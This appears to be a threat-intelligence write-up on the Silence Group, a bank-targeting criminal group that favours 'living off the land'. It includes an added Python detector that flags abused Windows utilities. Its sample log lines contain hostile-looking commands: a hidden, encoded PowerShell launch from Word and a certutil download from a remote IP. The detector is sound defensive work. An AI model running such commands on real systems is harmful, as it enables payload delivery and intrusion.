Threat Actor: Silence Group
Active since 2016, the Silence Group is a financially motivated cybercriminal organization that targets banks, in particular for the data used in the payment card industry. Its modus operandi is simple: make as much money as possible by compromising targets, in this case banks, through spearphishing, then exfiltrating financial data and "jackpotting" ATMs, that is, forcing them to dispense cash.
To achieve these goals, the Silence Group is known to repurpose publicly available tools and to rely on a technique the cybersecurity industry refers to as "living off the land." This means operating for as long as possible with the tools and commands already built into the target's operating system, to maximize the time spent inside the target environment before being noticed. The strategy has two benefits: first, activity carried out with locally available tools blends in with legitimate administration and is harder to detect, and second, the longer dwell time lets the group establish a deeper and stronger foothold.
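Because "living off the land" abuses binaries that are legitimately present on every host, detection has to look at how those binaries are invoked rather than at their presence. The following is an added example of that idea, not code from the original post and not a description of the Silence Group's actual commands: it scores constructed process-creation log lines (a pipe-delimited `timestamp|parent|image|command line` format assumed here) and flags a built-in utility that is spawned by a document handler, which is what a spearphishing attachment would produce, or that carries arguments typical of download-and-execute or hidden-window abuse. The utility list and argument patterns are generic assumptions for illustration.

```python
"""Minimal "living off the land" detector over process-creation telemetry.

Added example, not from the original post. The log lines, the log format,
the list of dual-use utilities and the argument patterns are all constructed
assumptions for illustration; none of them are claims about a specific group.
"""
import re
from dataclasses import dataclass

# Windows utilities commonly abused because they ship with the OS (assumption).
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe",
           "bitsadmin.exe"}

# Document handlers that should not normally spawn shells or scripting hosts;
# a built-in utility launched by one of these matches attachment-based delivery.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Command-line fragments that make a built-in utility more suspicious (assumption).
SUSPICIOUS_ARGS = [
    re.compile(r"-enc(odedcommand)?\s", re.I),      # encoded PowerShell
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),  # hidden window
    re.compile(r"urlcache", re.I),                  # certutil download trick
    re.compile(r"https?://", re.I),                 # remote payload URL
]


@dataclass
class Finding:
    score: int
    reasons: list
    line: str


def parse(line):
    """Split a constructed 'ts|parent|image|cmd' line into a dict, or None."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    return dict(zip(("ts", "parent", "image", "cmd"), parts))


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(evt):
    """Return (score, reasons) for one parsed event; 0 means nothing notable."""
    score, reasons = 0, []
    image, parent = basename(evt["image"]), basename(evt["parent"])
    if image not in LOLBINS:
        return score, reasons
    score += 1
    reasons.append(f"built-in utility {image}")
    if parent in OFFICE_PARENTS:
        score += 3
        reasons.append(f"spawned by document handler {parent}")
    for pat in SUSPICIOUS_ARGS:
        if pat.search(evt["cmd"]):
            score += 2
            reasons.append(f"argument matches /{pat.pattern}/")
    return score, reasons


def detect(lines, threshold=3):
    """Return Findings for every line whose score reaches the threshold."""
    findings = []
    for line in lines:
        evt = parse(line)
        if evt is None:
            continue
        score, reasons = score_event(evt)
        if score >= threshold:
            findings.append(Finding(score, reasons, line))
    return findings


# Constructed sample telemetry (raw strings keep the Windows backslashes intact).
SAMPLE_LOG = [
    r"2019-01-01T10:00:01Z|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe report.txt",
    r"2019-01-01T10:00:05Z|C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -enc SQBFAFgA",
    r"2019-01-01T10:00:09Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.10/x.txt x.txt",
    r"2019-01-01T10:00:12Z|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Process",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f.score, "; ".join(f.reasons))
        print("   ", f.line)
```

The scoring is deliberately additive so that a lone PowerShell launch from Explorer (score 1) stays below the threshold while the same binary launched by Word with an encoded, hidden command (score 8) and a certutil download (score 5) are surfaced; in a real deployment the parent/child relationship and the command line would come from Sysmon event ID 1 or an EDR feed rather than a constructed list.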
However, the group does not rely exclusively on publicly available tools. It is also known to write its own modular, custom tools. Because the motivations and the various TTPs of its living-off-the-land strategy have been documented previously, we will focus here on the details of the custom tools developed exclusively by this group.
For more information on the TTPs used by the Silence Group, read the blog listed in the appendix and go to our Playbook Viewer and select Silence Group from the menu.